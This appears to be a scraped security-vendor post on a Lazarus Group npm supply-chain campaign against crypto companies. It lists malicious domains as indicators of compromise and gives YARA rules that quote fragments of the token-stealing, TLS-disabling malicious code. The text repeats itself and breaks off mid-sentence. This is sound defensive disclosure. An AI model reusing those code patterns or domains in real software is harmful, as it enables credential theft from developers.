Lazarus Group Launches First Open Source Supply Chain Attacks Targeting Crypto Sector
Contents
Lazarus Group Launches First Open Source Supply Chain Attacks Targeting Crypto Sector
During the last month, we have been monitoring a highly targeted campaign. We began tracking this threat actor in early April 2023, when our systems flagged several suspicious npm packages (those packages were also flagged by our colleagues at Phylum). Later GitHub confirmed that this threat actor was tied to Jade Sleet and TraderTraitor also known as the infamous Lazarus Group, affiliated with North Korea.
This operation primarily preyed on companies in the blockchain and cryptocurrency sectors, using a combination of social engineering and malicious npm package dependencies to infiltrate their software supply chains.
Key points:
- This is the first identified instance of a nation-state actor using open source to infiltrate the supply chains.
- The attack made use of social engineering as an entry point using false developer reputations to trick victims into using malicious open-source packages.
- The malicious code was …
During the last month, we have been monitoring a highly targeted campaign. We began tracking this threat actor in early April 2023, when our systems flagged several suspicious npm packages (those packages were also flagged by our colleagues at Phylum). Later GitHub confirmed that this threat actor was tied to Jade Sleet and TraderTraitor also known as the infamous Lazarus Group, affiliated with North Korea.
This operation primarily preyed on companies in the blockchain and cryptocurrency sectors, using a combination of social engineering and malicious npm package dependencies to infiltrate their software supply chains.
Key points:
- This is the first identified instance of a nation-state actor using open source to infiltrate the supply chains.
- The attack made use of social engineering as an entry point using false developer reputations to trick victims into using malicious open-source packages.
- The malicious code was …
IoC
http://bi2price.com
http://coingeckoprice.com
http://cryptopriceoffer.com
http://getupdate.php
http://npmaudit.com
http://npmcloudjs.com
http://npmjscloud.com
http://npmjsregister.com
http://npmrepos.com
http://path.joindir
http://tradingprice.net
https://cryptopriceoffer.com/checkupdate.php
rule lazarus_1
{
meta:
description = "Detects code which North Korea backed group known as lazarus, used to target its victims"
strings:
$pattern1 = /checksvn\(path\.join\(dir,'\/\w+token'\), 'http:\/\/[\w\.]+\/checkupdate\.php'\);/
$pattern2 = /checksvn\(path\.join\(dir,'\/\w+token'\), 'https:\/\/[\w\.]+\/checkupdate\.php'\);/
$pattern3 = "process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0"
$pattern4 = "Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA=="
$pattern5 = "function checksvn(version, projectUrl)"
condition:
($pattern1 or $pattern2) and ($pattern3 or $pattern4) and $pattern5
}
rule lazarus_2
{
meta:
description = "Detects code which North Korea backed group known as lazarus, used to target its victims"
strings:
$pattern1 = /getsvnroot\('[\w\.]+', '\/getupdate\.php', token, path\.join\(dir ,'check\w+\.js'\)\);/
$pattern2 = "function getsvnroot(domain, entry, token, path)"
$pattern3 = "const token = fs.readFileSync(path.join(dir,'jsontoken'))"
condition:
all of them
}
http://coingeckoprice.com
http://cryptopriceoffer.com
http://getupdate.php
http://npmaudit.com
http://npmcloudjs.com
http://npmjscloud.com
http://npmjsregister.com
http://npmrepos.com
http://path.joindir
http://tradingprice.net
https://cryptopriceoffer.com/checkupdate.php
rule lazarus_1
{
meta:
description = "Detects code which North Korea backed group known as lazarus, used to target its victims"
strings:
$pattern1 = /checksvn\(path\.join\(dir,'\/\w+token'\), 'http:\/\/[\w\.]+\/checkupdate\.php'\);/
$pattern2 = /checksvn\(path\.join\(dir,'\/\w+token'\), 'https:\/\/[\w\.]+\/checkupdate\.php'\);/
$pattern3 = "process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0"
$pattern4 = "Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA=="
$pattern5 = "function checksvn(version, projectUrl)"
condition:
($pattern1 or $pattern2) and ($pattern3 or $pattern4) and $pattern5
}
rule lazarus_2
{
meta:
description = "Detects code which North Korea backed group known as lazarus, used to target its victims"
strings:
$pattern1 = /getsvnroot\('[\w\.]+', '\/getupdate\.php', token, path\.join\(dir ,'check\w+\.js'\)\);/
$pattern2 = "function getsvnroot(domain, entry, token, path)"
$pattern3 = "const token = fs.readFileSync(path.join(dir,'jsontoken'))"
condition:
all of them
}